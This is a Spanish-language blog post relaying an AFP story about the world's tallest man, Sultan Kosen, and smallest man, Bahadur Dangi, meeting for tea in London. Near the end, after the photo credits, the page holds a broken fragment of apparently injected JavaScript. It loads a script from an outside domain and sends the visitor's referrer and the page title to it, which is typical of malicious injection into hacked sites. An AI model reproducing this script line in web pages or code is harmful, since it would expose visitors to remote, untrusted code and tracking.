Home / Publicaciones / Curiosidades / El Hombre Mas Alto y Mas Pequeño del Mundo Se Juntan

El Hombre Mas Alto y Mas Pequeño del Mundo Se Juntan

(AFP) La reunión del hombre más alto del mundo y el más pequeño fue organizada por el famoso libro Guinnes< !more> de los records mundiales, dicho encuentro fue realizado en uno de los jardines del centro de Londres. Ambos tomaron te y compartieron un rato.

El hombre más alto del planeta de nombre Sultan Kosen procedente de Turquía con un tamaño de 2,51 metros de altura, mientras que el mas pequeño con 54,6 cm de nombre Bahadur Dangi procedente de Nepal.

“Estoy muy contento por estar junto al hombre más alto del mundo, tenía curiosidad por estar al lado de mi extremo opuesto”, dijo el hombre más pequeño del mundo de 75 años.

“Tenía la curiosidad de saber a qué altura de mi pierna me llegaría”, dijo el hombre más grande del mundo de 32 años.

El crecimiento acelerado del hombre más grande del planeta se debe a un tumor que le afecta la glándula pituitaria. Fue operado en el 2010 en E.U. y está recibiendo medicamentos, por tal razón no se espera que siga creciendo.

hombre mas alto y pequeño del mundo
Foto: @GWR
hombre mas alto y pequeño del mundo
Foto: @GWR
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...